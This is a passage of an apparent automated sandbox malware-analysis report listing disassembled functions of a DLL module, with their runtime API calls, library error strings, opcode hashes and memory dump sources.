                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
                                                          • String ID: vector<T> too long
                                                          • API String ID: 2677079660-3788999226
                                                          • Opcode ID: 0e7a0393519b3a16d5959be93d71fc8787f3f08ee623592f4fd3bee7dda37ed0
                                                          • Instruction ID: abf542739e5454ba3c6ab93be63a2923d68786ab8e1c7bb5cf45ab961b7b0b96
                                                          • Opcode Fuzzy Hash: 0e7a0393519b3a16d5959be93d71fc8787f3f08ee623592f4fd3bee7dda37ed0
                                                          • Instruction Fuzzy Hash: B82186B1A006059FD720CF6DD880A5EB7F5FF44364F244A2EE455E7B40DB31A9048BA0
                                                          Function 6CF65750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF6576B
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF65782
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                          • String ID: string too long
                                                          • API String ID: 963545896-2556327735
                                                          • Opcode ID: c483706efe8532534e2eea031793d3e62fdf623ac8468dc9e7309a4ca82f3411
                                                          • Instruction ID: c07b1a84682627affd560072bbd0ebc3d6fcbbb79350a5fa81d4aaee78399e5f
                                                          • Opcode Fuzzy Hash: c483706efe8532534e2eea031793d3e62fdf623ac8468dc9e7309a4ca82f3411
                                                          • Instruction Fuzzy Hash: 0F11E9333046149FD321DA6DE880AAAF7EDEFA5664F60072FE552E7F41C771A80483A1
                                                          Function 6CF546B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF546C4
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CF5470B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                          • String ID: string too long
                                                          • API String ID: 1785806476-2556327735
                                                          • Opcode ID: 0f817ea05d80b4f7e5d0879c95d26eae0f98e38aba316efa2dafc6ad8d8387aa
                                                          • Instruction ID: c111a714dceae99804f9a1d498dab1cbf8814a9247874bef16e653728970f427
                                                          • Opcode Fuzzy Hash: 0f817ea05d80b4f7e5d0879c95d26eae0f98e38aba316efa2dafc6ad8d8387aa
                                                          • Instruction Fuzzy Hash: 2D110B321087105FE720DD78B8C0A6ABBB8AF71318F640B2ED59783AC1D731E5788761
                                                          Function 6CF84D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF84E00
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          • OutputBuffer, xrefs: 6CF84D77
                                                          • ArraySink: missing OutputBuffer argument, xrefs: 6CF84D91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                          • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                          • API String ID: 3718517217-3781944848
                                                          • Opcode ID: 632e91b5c672be3c86cc1bef1eeb7266061813d914f70f4b38f86c5ad3343175
                                                          • Instruction ID: 994367c0e142f2abf5c9bb96360893f9dd70a64e283eb32799af7e51c3b58f70
                                                          • Opcode Fuzzy Hash: 632e91b5c672be3c86cc1bef1eeb7266061813d914f70f4b38f86c5ad3343175
                                                          • Instruction Fuzzy Hash: 2D3105B55083809FC310CF69C480A9BFBF4BB99614F508E1EF5A693B50DB75E908CB92
                                                          Function 6CF60150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CF54010: std::_Xinvalid_argument.LIBCPMT ref: 6CF5402A
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF60201
                                                            • Part of subcall function 6CFBAC75: RaiseException.KERNEL32(?,?,6CFB9C34,CA0C7769,?,?,?,?,6CFB9C34,CA0C7769,6CFE9C90,6CFFB974,CA0C7769), ref: 6CFBACB7
                                                          Strings
                                                          • StringSink: OutputStringPointer not specified, xrefs: 6CF6019B
                                                          • OutputStringPointer, xrefs: 6CF6018C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                          • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                          • API String ID: 3718517217-1331214609
                                                          • Opcode ID: 8be4ba877ad2928e727ea95c561e40f297bda995d8d17359de9b278871f91c29
                                                          • Instruction ID: 3e7f0191eca608b8b237540adf1aa1ebaf456db349ce4d3a4b9becc5f6c3cd50
                                                          • Opcode Fuzzy Hash: 8be4ba877ad2928e727ea95c561e40f297bda995d8d17359de9b278871f91c29
                                                          • Instruction Fuzzy Hash: D7215071D04248AFCB04DFE9D890BDDFBB4EB19314F14865AE425A7B91DB356A08CB50
                                                          Function 6CF54620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF54636
                                                            • Part of subcall function 6CFB9125: std::exception::exception.LIBCMT ref: 6CFB913A
                                                            • Part of subcall function 6CFB9125: __CxxThrowException@8.LIBCMT ref: 6CFB914F
                                                            • Part of subcall function 6CFB9125: std::exception::exception.LIBCMT ref: 6CFB9160
                                                          • _memmove.LIBCMT ref: 6CF5466F
                                                          Strings
                                                          • invalid string position, xrefs: 6CF54631
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                          • String ID: invalid string position
                                                          • API String ID: 1785806476-1799206989
                                                          • Opcode ID: 5f49c83b8ba5df0ff1c4c5f2b898a5590428e1ee27a63e5a8d764596a9645511
                                                          • Instruction ID: aa26afedfd767e5485ff5a888888f887f190214f93bcda664205e9289ae5b6cb
                                                          • Opcode Fuzzy Hash: 5f49c83b8ba5df0ff1c4c5f2b898a5590428e1ee27a63e5a8d764596a9645511
                                                          • Instruction Fuzzy Hash: 1A01D6323002408BD3208D6CEC80B5AFBBAEBE1754B64492DD295CBF81D7B1EC6187A1
                                                          Function 6CF8ACA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • type_info::operator!=.LIBCMT ref: 6CF8ACF8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: type_info::operator!=
                                                          • String ID: Modulus$PublicExponent
                                                          • API String ID: 2241493438-3324115277
                                                          • Opcode ID: 3725ff1ed0fbe4ed407f80d7ce205fb377abac538fd5f774cb05fdbab0384ea6
                                                          • Instruction ID: 395e2814ed28e868c3811d1a694256abad4f79bb3623f5568b979b45794d3ce5
                                                          • Opcode Fuzzy Hash: 3725ff1ed0fbe4ed407f80d7ce205fb377abac538fd5f774cb05fdbab0384ea6
                                                          • Instruction Fuzzy Hash: FA11E37190A3049FC600DF28884158BFBF4EFD6648F01461EF481ABBA0DB31D94CCB92
                                                          Function 6CFAB7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • type_info::operator!=.LIBCMT ref: 6CFAB848
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: type_info::operator!=
                                                          • String ID: Modulus$PublicExponent
                                                          • API String ID: 2241493438-3324115277
                                                          • Opcode ID: 7483b462fc3ce27b0d11aff0ff54b4a724fe03c180bfe4c6bad9dab1d4e2c405
                                                          • Instruction ID: 61c4fc9b1d3a9d82231fe61382d8f7d284ab4d87182f2ab4f0e0dce9f6a31462
                                                          • Opcode Fuzzy Hash: 7483b462fc3ce27b0d11aff0ff54b4a724fe03c180bfe4c6bad9dab1d4e2c405
                                                          • Instruction Fuzzy Hash: 80110631509344AEC600DFBD884158BFBF4AFD5648F004A6EF8815BB50DB31E94ECB96
                                                          Function 6CF8B5F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF8B605
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CF8B634
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                          • String ID: vector<T> too long
                                                          • API String ID: 1785806476-3788999226
                                                          • Opcode ID: b1ac347028d4a37508cb9035052818765a7efdc53d3ddcdfec93db6c2ba916f9
                                                          • Instruction ID: 2fab5ead47ecaedf9572f1fc74f30a3259ae4e4c4dabc4da23a7fd865af23194
                                                          • Opcode Fuzzy Hash: b1ac347028d4a37508cb9035052818765a7efdc53d3ddcdfec93db6c2ba916f9
                                                          • Instruction Fuzzy Hash: 3201B1B26012059FC324DEA9DC90CA7B3F8EB542147144A2DE99AD3A50EB70F9048B60
                                                          Function 6CFB4230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CFB4241
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CFB4277
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                          • String ID: vector<bool> too long
                                                          • API String ID: 1785806476-842332957
                                                          • Opcode ID: ce7df87c3ee3c942cc73dabe221f879acbb4eb16bda5ff32dd007c63b74d2f74
                                                          • Instruction ID: 6631a7a31fc32ffc4f49dba34987a2f273c3671be5e8e697bf64cc090de87626
                                                          • Opcode Fuzzy Hash: ce7df87c3ee3c942cc73dabe221f879acbb4eb16bda5ff32dd007c63b74d2f74
                                                          • Instruction Fuzzy Hash: A101D472A005055BC704CF6ADD918AEB7A9FB84358F51422AE51697A40E735E908C6A0
                                                          Function 6CFB3840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CFB3855
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CFB3880
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                          • String ID: vector<T> too long
                                                          • API String ID: 1785806476-3788999226
                                                          • Opcode ID: 923f09ee64c7915e2d18acfcbaf62dcb2feab36d587384c8584866691a14139e
                                                          • Instruction ID: ceb161a2cd651032a9b1a7093351567c1c49b52f661c4d0decb77b9a788d2908
                                                          • Opcode Fuzzy Hash: 923f09ee64c7915e2d18acfcbaf62dcb2feab36d587384c8584866691a14139e
                                                          • Instruction Fuzzy Hash: 300171725006099FD314DFAED884C9AB3E9AF542147114A3DE5AAE3B50EF70F9088B60
                                                          Function 6CF65160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6CF65173
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB90ED
                                                            • Part of subcall function 6CFB90D8: __CxxThrowException@8.LIBCMT ref: 6CFB9102
                                                            • Part of subcall function 6CFB90D8: std::exception::exception.LIBCMT ref: 6CFB9113
                                                          • _memmove.LIBCMT ref: 6CF6519E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                          • String ID: vector<T> too long
                                                          • API String ID: 1785806476-3788999226
                                                          • Opcode ID: 15f0741d4e34392b9877c99dad647d059fd0618d54289647b5f4b6008fdfb9c6
                                                          • Instruction ID: 8f3b5e0c4605cd58756cf627b217e51171882ba135d347724197e57e2756962c
                                                          • Opcode Fuzzy Hash: 15f0741d4e34392b9877c99dad647d059fd0618d54289647b5f4b6008fdfb9c6
                                                          • Instruction Fuzzy Hash: CF01A2B16042069FD728CFAACC91C6BB3E9EF542447154A2DE85AD3F40EB31F904CB60
                                                          Function 6CFBBFB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFBABC3: __getptd.LIBCMT ref: 6CFBABC9
                                                            • Part of subcall function 6CFBABC3: __getptd.LIBCMT ref: 6CFBABD9
                                                          • __getptd.LIBCMT ref: 6CFBBFC3
                                                            • Part of subcall function 6CFBEAE6: __getptd_noexit.LIBCMT ref: 6CFBEAE9
                                                            • Part of subcall function 6CFBEAE6: __amsg_exit.LIBCMT ref: 6CFBEAF6
                                                          • __getptd.LIBCMT ref: 6CFBBFD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
